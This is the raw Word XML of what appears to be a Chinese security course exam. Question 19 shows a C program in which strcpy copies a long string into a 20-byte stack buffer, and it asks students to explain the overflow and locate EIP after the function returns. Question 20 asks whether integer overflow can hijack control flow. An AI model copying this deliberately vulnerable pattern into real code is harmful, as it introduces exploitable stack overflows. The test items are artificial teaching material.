                        <w:t xml:space="preserve">printf("Data copied\n"); </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4941F72F"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else { </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="02B4B1C0" w14:textId="77777777" w:rsidR="000012A0" w:rsidRPr="00A15875" w:rsidRDefault="000012A0" w:rsidP="000012A0">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:ind w:firstLineChars="400" w:firstLine="840"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00A15875">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t xml:space="preserve">printf("Too many data\n"); </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6913C6E6"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 </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="36C24F95"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txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DD35B8" w14:textId="3DE9F866" w:rsidR="000012A0" w:rsidRPr="00CA5248" w:rsidRDefault="00530B90" w:rsidP="000012A0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已知有以下源代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5962DCBD" w14:textId="77777777" w:rsidR="000012A0" w:rsidRPr="00CA5248" w:rsidRDefault="000012A0" w:rsidP="000012A0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ACCD23D" wp14:editId="1EAA61A1">
                <wp:extent cx="5099322" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                <wp:docPr id="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322" cy="1404620"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5773D26E"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int TestBuffer(char  *Buf,  int,  int,  int);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="115CB4DC"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int main(){  </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2C9308CE"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printf("%d:%s",0,"This Is a Test Program!\r\n");</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1FC5991C"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printf("%d:%s",1,"There is a Buffer,test whether there is any problem!\r\n");</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7A8F8B94"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char Buffer[256];</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6FEAA6BF"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strcpy(Buffer,"ThisBufferisLimitedtoanumberwilloverflowing!\r\n");</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="180BE281"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TestBuffer(Buffer,1,2,3);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1AFD1EBF"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p w14:paraId="7B913B7B"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Int TestBuffer(char *Buf,  int x0,  int y0,  int z0){</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0DA3E36F" w14:textId="77777777" w:rsidR="000012A0" w:rsidRPr="00A15875" w:rsidRDefault="000012A0" w:rsidP="000012A0">
                            <w:pPr>
                              <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                              <w:ind w:firstLineChars="50" w:firstLine="105"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00A15875">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t xml:space="preserve">   DWORD x;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6358D5A4"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char Buffer[20];</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6208D6E2"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DWORD y, z;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="082881EF"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x=x0;</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00A15875">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00A15875">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:tab/>
                              <w:t>y=y0;</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00A15875">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00A15875">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:tab/>
                              <w:t>z=z0;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="150D5B89"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strcpy(Buffer,Buf);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3C7D429A"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printf("Test:%s,%d  %d  %d  %d  %d  %d",Buffer,x,y,z);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2C70F1C0"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return 1;  </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="03F72A7F"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txbxContent>
                      </wps:txbx>
                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                        <a:spAutoFit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="7ACCD23D" id="_x0000_s1155" type="#_x0000_t202" style="width:4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IMFAIAAP8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4u8uXy/WzGmaTYdJ7Pr2apLZkono879OGTgo7FScmRuprkxeHBh5iOKJ63xNs8GF1vtTFp&#10;gbtqY5AdBDlgm75UwattxrK+5MvFbJGULcTzyRydDuRQo7uS3+TxGz0TcXy0ddoShDbjnDIx9sQn&#10;IhnhhKEamK5J/zoejrwqqI9EDGF0JL0gmrSAfzjryY0l97/3AhVn5rMl6svpfB7tmxbzxTUhYngZ&#10;qS4jwkqSKnngbJxuQrJ84uHuqDtbnbi9ZHLKmVyWcJ5eRLTx5Trtenm36ycAAAD//wMAUEsDBBQA&#10;BgAIAAAAIQBxATS92gAAAAUBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BS8NAEIXvgv9hGcGb3SRi&#10;KTGbUgQv0oOtHjxOkzGbJjsbs5s2/ntHL/Yy8HjDe98r1rPr1YnG0Ho2kC4SUMSVr1tuDLy/Pd+t&#10;QIWIXGPvmQx8U4B1eX1VYF77M+/otI+NkhAOORqwMQ651qGy5DAs/EAs3qcfHUaRY6PrEc8S7nqd&#10;JclSO2xZGiwO9GSp6vaTk5JtqKad/zqm205/2G6JD6/2xZjbm3nzCCrSHP+f4Rdf0KEUpoOfuA6q&#10;NyBD4t8Vb5XcizwYyLI0A10W+pK+/AEAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAA&#10;EwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/&#10;1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCTvDIM&#10;FAIAAP8DAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBx&#10;ATS92gAAAAUBAAAPAAAAAAAAAAAAAAAAAG4EAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADz&#10;AAAAdQUAAAAA&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="5773D26E"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int TestBuffer(char  *Buf,  int,  int,  int);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="115CB4DC"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int main(){  </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2C9308CE"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printf("%d:%s",0,"This Is a Test Program!\r\n");</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1FC5991C"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printf("%d:%s",1,"There is a Buffer,test whether there is any problem!\r\n");</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7A8F8B94"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char Buffer[256];</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6FEAA6BF"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strcpy(Buffer,"ThisBufferisLimitedtoanumberwilloverflowing!\r\n");</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="180BE281"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TestBuffer(Buffer,1,2,3);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1AFD1EBF"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p w14:paraId="7B913B7B"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Int TestBuffer(char *Buf,  int x0,  int y0,  int z0){</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0DA3E36F" w14:textId="77777777" w:rsidR="000012A0" w:rsidRPr="00A15875" w:rsidRDefault="000012A0" w:rsidP="000012A0">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:ind w:firstLineChars="50" w:firstLine="105"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00A15875">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t xml:space="preserve">   DWORD x;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6358D5A4"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char Buffer[20];</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6208D6E2"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DWORD y, z;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="082881EF"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x=x0;</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00A15875">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00A15875">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:tab/>
                        <w:t>y=y0;</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00A15875">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00A15875">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:tab/>
                        <w:t>z=z0;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="150D5B89"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strcpy(Buffer,Buf);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3C7D429A"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 xml:space="preserve">    printf("Test:%s,%d  %d  %d  %d  %d  %d",Buffer,x,y,z);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2C70F1C0" w14:textId="77777777" w:rsidR="000012A0" w:rsidRPr="00A15875" w:rsidRDefault="000012A0" w:rsidP="000012A0">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:ind w:firstLine="420"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00A15875">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t xml:space="preserve">return 1;  </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="03F72A7F" w14:textId="77777777" w:rsidR="000012A0" w:rsidRPr="00A15875" w:rsidRDefault="000012A0" w:rsidP="000012A0">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00A15875">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t>}</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BB131B" w14:textId="77777777" w:rsidR="000012A0" w:rsidRPr="00CA5248" w:rsidRDefault="000012A0" w:rsidP="000012A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析上述源代码存在什么问题, 并指出该问题导致的后果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D8C17B" w14:textId="77777777" w:rsidR="000012A0" w:rsidRPr="00CA5248" w:rsidRDefault="000012A0" w:rsidP="000012A0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(2) 试确定在X86平台无编译优化情况下，执行完TestBuffer函数后CPU EIP指针指向的地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D838140" w14:textId="1C5D9C67" w:rsidR="000012A0" w:rsidRDefault="00530B90" w:rsidP="000012A0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若代码中不存在内存申请及内存拷贝操作，请思考整数溢出是否会导致程序控制流被劫持，并解释原因。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180EEBB9" w14:textId="77777777" w:rsidR="000012A0" w:rsidRPr="000012A0" w:rsidRDefault="000012A0" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC5A6E3" w14:textId="428906D5" w:rsidR="004B212C" w:rsidRPr="00715DC2" w:rsidRDefault="004B212C" w:rsidP="00715DC2">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="004B212C" w:rsidRPr="00715D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BCE94" w14:textId="77777777" w:rsidR="00E9430B" w:rsidRDefault="00E9430B" w:rsidP="002C1A85">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0DCB70FA" w14:textId="77777777" w:rsidR="00E9430B" w:rsidRDefault="00E9430B" w:rsidP="002C1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7F06F" w14:textId="77777777" w:rsidR="00E9430B" w:rsidRDefault="00E9430B" w:rsidP="002C1A85">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6C52D50C" w14:textId="77777777" w:rsidR="00E9430B" w:rsidRDefault="00E9430B" w:rsidP="002C1A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3EA287"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="873EA287"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="400"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%2．"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="400"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="（%3）"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="402"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="9BE23F43"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9BE23F43"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="845" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="C3DC2565"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C3DC2565"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="400"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%2．"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="400"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="（%3）"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="402"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="FAAF5D73"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FAAF5D73"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="845" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00421AEB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="16B80472"/>
    <w:lvl w:ilvl="0" w:tplc="4CAE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D85EBE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DAF449C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1E00889"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13B4567C"/>
    <w:lvl w:ilvl="0" w:tplc="0ABEA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A05C1F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="21C4C6C8"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="第%1章"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1417"/>
        </w:tabs>
        <w:ind w:left="1276" w:hanging="284"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1559"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w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="992" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1984" w:hanging="992"/>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268" w:hanging="1276"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2410" w:hanging="1418"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2551" w:hanging="1559"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="46E86B02"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D5885EF4"/>
    <w:lvl w:ilvl="0" w:tplc="D1100576">
      <w:start w:val="6"/>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A3D2E0E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C4B4B78E"/>
    <w:lvl w:ilvl="0" w:tplc="CCB48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F755D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C374CD22"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>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76C23E56"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="42621C7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7510111">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="690886215">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="966395775">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1149591511">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="653994306">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1528831207">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1010640747">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="857044794">
    <w:abstractNumId w:val="7"/>
    <w:lvlOverride w:ilvl="0">
      <w:lvl w:ilvl="0">
        <w:start w:val="4"/>
        <w:numFmt w:val="decimal"/>
        <w:lvlText w:val="第%1章"/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
          <w:tabs>
            <w:tab w:val="num" w:pos="425"/>
          </w:tabs>
          <w:ind w:left="284" w:hanging="284"/>
        </w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:lvl>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="1">
      <w:lvl w:ilvl="1">
        <w:start w:val="1"/>
        <w:numFmt w:val="decimal"/>
        <w:isLgl/>
        <w:lvlText w:val="%1.%2"/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
          <w:ind w:left="567" w:hanging="567"/>
        </w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:lvl>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="2">
      <w:lvl w:ilvl="2">
        <w:start w:val="1"/>
        <w:numFmt w:val="decimal"/>
        <w:isLgl/>
